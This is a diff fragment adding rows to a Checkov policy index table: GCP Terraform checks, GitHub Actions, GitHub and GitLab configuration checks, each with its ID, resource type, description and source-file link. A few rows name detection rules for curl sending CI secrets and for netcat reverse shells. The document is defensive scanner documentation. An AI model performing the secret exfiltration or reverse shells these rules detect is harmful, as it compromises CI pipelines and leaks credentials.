+| 2557 | CKV_GCP_123 | resource | google_container_cluster | GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) |
+| 2558 | CKV_GCP_124 | resource | google_cloudfunctions2_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) |
+| 2559 | CKV_GCP_124 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) |
+| 2560 | CKV2_GCP_1 | resource | google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) |
+| 2561 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) |
+| 2562 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) |
+| 2563 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 2564 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 2565 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 2566 | CKV2_GCP_4 | resource | google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 2567 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) |
+| 2568 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) |
+| 2569 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) |
+| 2570 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) |
+| 2571 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) |
+| 2572 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) |
+| 2573 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) |
+| 2574 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) |
+| 2575 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) |
+| 2576 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) |
+| 2577 | CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) |
+| 2578 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) |
+| 2579 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) |
+| 2580 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) |
+| 2581 | CKV2_GCP_11 | resource | google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) |
+| 2582 | CKV2_GCP_12 | resource | google_compute_firewall | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) |
+| 2583 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) |
+| 2584 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) |
+| 2585 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) |
+| 2586 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) |
+| 2587 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) |
+| 2588 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) |
+| 2589 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) |
+| 2590 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) |
+| 2591 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) |
+| 2592 | CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) |
+| 2593 | CKV2_GCP_23 | resource | google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) |
+| 2594 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) |
+| 2595 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) |
+| 2596 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) |
+| 2597 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) |
+| 2598 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) |
+| 2599 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) |
+| 2600 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) |
+| 2601 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) |
+| 2602 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) |
+| 2603 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) |
+| 2604 | CKV2_GCP_34 | resource | google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) |
+| 2605 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) |
+| 2606 | CKV2_GCP_36 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) |
+| 2607 | CKV_GHA_1 | jobs | jobs | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) |
+| 2608 | CKV_GHA_1 | jobs | jobs.*.steps[] | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) |
+| 2609 | CKV_GHA_2 | jobs | jobs | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) |
+| 2610 | CKV_GHA_2 | jobs | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) |
+| 2611 | CKV_GHA_3 | jobs | jobs | Suspicious use of curl with secrets | github_actions | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) |
+| 2612 | CKV_GHA_3 | jobs | jobs.*.steps[] | Suspicious use of curl with secrets | github_actions | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) |
+| 2613 | CKV_GHA_4 | jobs | jobs | Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) |
+| 2614 | CKV_GHA_4 | jobs | jobs.*.steps[] | Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) |
+| 2615 | CKV_GHA_5 | jobs | jobs | Found artifact build without evidence of cosign sign execution in pipeline | github_actions | [CosignArtifacts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignArtifacts.py) |
+| 2616 | CKV_GHA_6 | jobs | jobs | Found artifact build without evidence of cosign sbom attestation in pipeline | github_actions | [CosignSBOM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignSBOM.py) |
+| 2617 | CKV_GHA_7 | jobs | on | The build output cannot be affected by user parameters other than the build entry point and the top-level source location. GitHub Actions workflow_dispatch inputs MUST be empty. | github_actions | [EmptyWorkflowDispatch.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py) |
+| 2618 | CKV2_GHA_1 | resource | permissions | Ensure top-level permissions are not set to write-all | github_actions | [ReadOnlyTopLevelPermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/graph_checks/ReadOnlyTopLevelPermissions.yaml) |
+| 2619 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) |
+| 2620 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) |
+| 2621 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) |
+| 2622 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
+| 2623 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
+| 2624 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
+| 2625 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) |
+| 2626 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) |
+| 2627 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) |
+| 2628 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) |
+| 2629 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) |
+| 2630 | CKV_GITHUB_1 | github_configuration | * | Ensure GitHub organization security settings require 2FA | github_configuration | [2fa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/2fa.py) |
+| 2631 | CKV_GITHUB_2 | github_configuration | * | Ensure GitHub organization security settings require SSO | github_configuration | [sso.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/sso.py) |
+| 2632 | CKV_GITHUB_3 | github_configuration | * | Ensure GitHub organization security settings has IP allow list enabled | github_configuration | [ipallowlist.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/ipallowlist.py) |
+| 2633 | CKV_GITHUB_4 | github_configuration | * | Ensure GitHub branch protection rules requires signed commits | github_configuration | [require_signatures.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_signatures.py) |
+| 2634 | CKV_GITHUB_5 | github_configuration | * | Ensure GitHub branch protection rules does not allow force pushes | github_configuration | [disallow_force_pushes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_force_pushes.py) |
+| 2635 | CKV_GITHUB_6 | github_configuration | * | Ensure GitHub organization webhooks are using HTTPS | github_configuration | [webhooks_https_orgs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_orgs.py) |
+| 2636 | CKV_GITHUB_7 | github_configuration | * | Ensure GitHub repository webhooks are using HTTPS | github_configuration | [webhooks_https_repos.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_repos.py) |
+| 2637 | CKV_GITHUB_8 | github_configuration | * | Ensure GitHub branch protection rules requires linear history | github_configuration | [require_linear_history.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_linear_history.py) |
+| 2638 | CKV_GITHUB_9 | github_configuration | * | Ensure 2 admins are set for each repository | github_configuration | [repository_collaborators.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/repository_collaborators.py) |
+| 2639 | CKV_GITHUB_10 | github_configuration | * | Ensure branch protection rules are enforced on administrators | github_configuration | [enforce_branch_protection_admins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/enforce_branch_protection_admins.py) |
+| 2640 | CKV_GITHUB_11 | github_configuration | * | Ensure GitHub branch protection dismisses stale review on new commit | github_configuration | [dismiss_stale_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/dismiss_stale_reviews.py) |
+| 2641 | CKV_GITHUB_12 | github_configuration | * | Ensure GitHub branch protection restricts who can dismiss PR reviews | github_configuration | [restrict_pr_review_dismissal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/restrict_pr_review_dismissal.py) |
+| 2642 | CKV_GITHUB_13 | github_configuration | * | Ensure GitHub branch protection requires CODEOWNER reviews | github_configuration | [require_code_owner_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_code_owner_reviews.py) |
+| 2643 | CKV_GITHUB_14 | github_configuration | * | Ensure all checks have passed before the merge of new code | github_configuration | [require_status_checks_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_status_checks_pr.py) |
+| 2644 | CKV_GITHUB_15 | github_configuration | * | Ensure inactive branches are reviewed and removed periodically | github_configuration | [disallow_inactive_branch_60days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_inactive_branch_60days.py) |
+| 2645 | CKV_GITHUB_16 | github_configuration | * | Ensure GitHub branch protection requires conversation resolution | github_configuration | [require_conversation_resolution.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_conversation_resolution.py) |
+| 2646 | CKV_GITHUB_17 | github_configuration | * | Ensure GitHub branch protection requires push restrictions | github_configuration | [require_push_restrictions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_push_restrictions.py) |
+| 2647 | CKV_GITHUB_18 | github_configuration | * | Ensure GitHub branch protection rules does not allow deletions | github_configuration | [disallow_branch_deletions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_branch_deletions.py) |
+| 2648 | CKV_GITHUB_19 | github_configuration | * | Ensure any change to code receives approval of two strongly authenticated users | github_configuration | [require_2approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_2approvals.py) |
+| 2649 | CKV_GITHUB_20 | github_configuration | * | Ensure open git branches are up to date before they can be merged into codebase | github_configuration | [require_updated_branch_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_updated_branch_pr.py) |
+| 2650 | CKV_GITHUB_21 | github_configuration | * | Ensure public repository creation is limited to specific members | github_configuration | [public_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/public_repository_creation_is_limited.py) |
+| 2651 | CKV_GITHUB_22 | github_configuration | * | Ensure private repository creation is limited to specific members | github_configuration | [private_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/private_repository_creation_is_limited.py) |
+| 2652 | CKV_GITHUB_23 | github_configuration | * | Ensure internal repository creation is limited to specific members | github_configuration | [internal_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/internal_repository_creation_is_limited.py) |
+| 2653 | CKV_GITHUB_26 | github_configuration | * | Ensure minimum admins are set for the organization | github_configuration | [minimum_admins_in_org.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/minimum_admins_in_org.py) |
+| 2654 | CKV_GITHUB_27 | github_configuration | * | Ensure strict base permissions are set for repositories | github_configuration | [require_strict_base_permissions_repository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_strict_base_permissions_repository.py) |
+| 2655 | CKV_GITHUB_28 | github_configuration | * | Ensure an organization's identity is confirmed with a Verified badge Passed | github_configuration | [require_verified_organization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_verified_organization.py) |
+| 2656 | CKV_GITLAB_1 | gitlab_configuration | * | Merge requests should require at least 2 approvals | gitlab_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/merge_requests_approvals.py) |
+| 2657 | CKV_GITLAB_2 | gitlab_configuration | * | Ensure all Gitlab groups require two factor authentication | gitlab_configuration | [two_factor_authentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/two_factor_authentication.py) |
+| 2658 | CKV_GITLABCI_1 | jobs | *.script[] | Suspicious use of curl with CI environment variables in script | gitlab_ci | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py) |
+| 2659 | CKV_GITLABCI_2 | jobs | *.rules | Avoid creating rules that generate double pipelines | gitlab_ci | [AvoidDoublePipelines.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py) |
+| 2660 | CKV_GITLABCI_3 | jobs | *.image[] | Detecting image usages in gitlab workflows | gitlab_ci | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) |
